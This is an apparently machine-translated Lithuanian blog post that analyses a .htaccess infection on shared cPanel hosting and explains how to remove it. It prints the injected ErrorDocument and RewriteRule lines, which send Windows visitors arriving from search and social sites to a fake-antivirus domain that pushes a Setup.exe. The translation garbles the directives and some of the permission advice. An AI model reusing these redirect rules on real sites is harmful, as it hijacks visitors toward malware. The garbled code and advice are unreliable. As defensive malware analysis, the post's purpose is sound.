Kenkėjiška programa / virusas - .htaccess „perrašyti“ ir peradresuoti

Naujos formos virusas kuri matau ne žinoti daug, įtakos svetainėse, priglobtose nepatikimi serveriai kur tarp jų gali būti „matomos“ vartotojo abonementai / padomenio abonementai. Tiksliau, visos prieglobos paskyros yra dedamos į aplanką "vhosts“, Ir rašymo teisė vartotojo aplankas daugumai situacijų perpardavėjas suteikia „vhosts“ bendram vartotojui. Tai tipinis nenaudojamų žiniatinklio serverių metodas WHM / Cpanel.

.Htaccess virus action - .htaccess hack

Virusas įtakos failus .htaccess Svetainės aukos. Aš pridėjo linijos / Direktyva į peradresuoti lankytojų (atkeliaukite iš „yahoo“, „msn“, „Google“, „Facebook“, „yaindex“, „Twitter“, „myspace“ ir kt. didelio srauto svetainių ir portalų) į kai kurias svetaines, kurios siūlo "antivirusinė“. Tai apie Pranešk apie netikrą antivirusinęKuris rašiau įvade .

Tai kaip .htaccess įtakos: (negali pasiekti turinio URL šias eilutes)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine Apie

RewriteCond% {HTTP_REFERER} *. Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. VKontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Puslapis. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vamzdžių. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mokėjimo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MySpace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Twitter". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. "Facebook". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Google". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Bing". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Amazon". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * EBay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. LinkedIn ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Flickr". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Pušų. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Orkut". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. LiveJournal ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Yahoo". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Paklausti. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. HotBot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Pereiti. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mama. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. AllTheWeb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ieškoti *. $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond% {HTTP_REFERER}. * Paštas *. $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Dogpile. * $ [NC]

„RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
„RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Tie, kurie naudoja WordPress jie ras šias eilutes faile .htaccess nuo public_html. Be to, virusas aplanke sukuria identišką .htaccess WP-kiekis.

*Taip pat yra situacijų, kai vietoj peoriavascularsurgery.com pasirodo dns.thesoulfoodcafe.com ar kitais adresais.

Ką daro šis virusas?

Nukreipus lankytoją išskėstomis rankomis pasitinka pranešimas:

Dėmesio!
Jūsų kompiuteryje yra įvairių virusų ir kenkėjiškų programų buvimo požymių. tavo system reikia nedelsiant patikrinti antivirusinę programą!
System Sauga atliks greitą ir nemokamą kompiuterio patikrinimą, ar nėra virusų ir kenkėjiškų programų.

kenkėjiška programa 1

Nesvarbu, kurį mygtuką paspausime, mes pateksime į puslapį "Mano kompiuteris", Sukurtas mėgdžioti XP dizainas. Čia automatiškai prasideda „nuskaitymo procesas“, kurio pabaigoje mes pastebime, kad „mes esame užkrėsti“.

kenkėjiška programa 2

Paspaudus OK arba Cancel, jis prasidės parsisiųstibylos Setup.exe. Tai setup.exe yra netikras antivirusas turinčių įtakos sistemai. Ji įdiegs kenkėjiškų programų seriją, kad būtų toliau platinamos užkrėstos nuorodos, be to, antivirusinė programinė įranga (taip pat netikras), kurį auka kviečiama pirkti.
Tie, kurie jau užsikrėtė šia viruso forma, gali ja naudotis . Taip pat rekomenduojama nuskaityti visą HDD. rekomenduoju "Kaspersky Internet Security" arba Kaspersky Anti-Virus.

Ši viruso forma veikia lankytojų, turinčių operacines sistemas, operacines sistemas Windows XP Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Iki šiol nėra žinomi jokie operacinių sistemų užkrėtimo atvejai Windows Akivaizdu, kad taip Windows 7.

Kaip mes galime pašalinti šį .htaccess virusą iš serverio ir kaip išvengti infekcijos.

1. Failų analizė ir įtartinų kodų ištrynimas. Užtikrinti, kad tai paveiktų ne tik failą .htaccess tai gera analizuojame visus failus . PHP si . Js.

2. Perrašykite .htaccess failą ir nustatykite jį chmod 644 arba 744 tik su rašymo teisėmis vartotojo savininkas.

3. Kurdami svetainės prieglobos abonementą aplanke / Pagrindinis puslapis arba / webroot automatiškai sukurs aplanką, kuriame dažniausiai yra vartotojo vardas (cpanel, ftp vartotojasir tt). Norint išvengti duomenų rašymo ir virusų perdavimo iš vieno vartotojo kitam, kiekviename vartotojo aplanke rekomenduojama nustatyti:

chmod 644 arba 744, 755 – 644 nurodomi.
chown -R vartotojo vardas aplanko_vardas.
chgrp -R vartotojo_vardas aplanko_vardas

ls-visi patikrinti, ar režimai nustatyti teisingai. Kažkas kaip:

drwx - x - x 12 dinamika dinamika 4096 gegužės 6 14:51 dinamika /
drwx - x - x 10 duran duran 4096 kovas 7 07:46 duran /
drwx - x - x 12 mėgintuvėlio mėgintuvėlis 4096 sausis 29 11:23 mėgintuvėlis /
drwxr-xr-x 14 express express 4096 26 m. vasario 2009 d. express /
drwxr-xr-x 9 ezo ezo 4096 gegužės 19 d., 01:09 ezo /
drwx - x - x 9 farma farma 4096 gruodžio 19 22:29 farma /

Jei vienas iš aukščiau nurodytų vartotojų turės FTP Užkrėsti failai, ji negalės nusiųsti viruso kitam priglobtam vartotojui. Tai yra minimali saugumo priemonė, skirta apsaugoti žiniatinklio serveryje esančias paskyras.

Bendrieji domenų, paveiktų šio tipo virusų, elementai.

Visi paveikti domenai nukreipia lankytojus į svetaines, kuriose yra „/main.php? s = 4 & H".

Tai.htaccess virusas“Paveikia bet kokio tipo TVS (Joomla, WordPress, phpBBir kt.), kuri naudoja .htaccess

.htaccess Virus Hack & Redirect.

Įkūrėjas ir redaktorius Stealth Settings, nuo 2006 m. iki dabar. Patirtis dirbant su operacinėmis sistemomis Linux (Ypač CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (TVS).

kaip » Antivirusinė programa ir sauga » Kenkėjiška programa / virusas - .htaccess „perrašyti“ ir peradresuoti
Palikite komentarą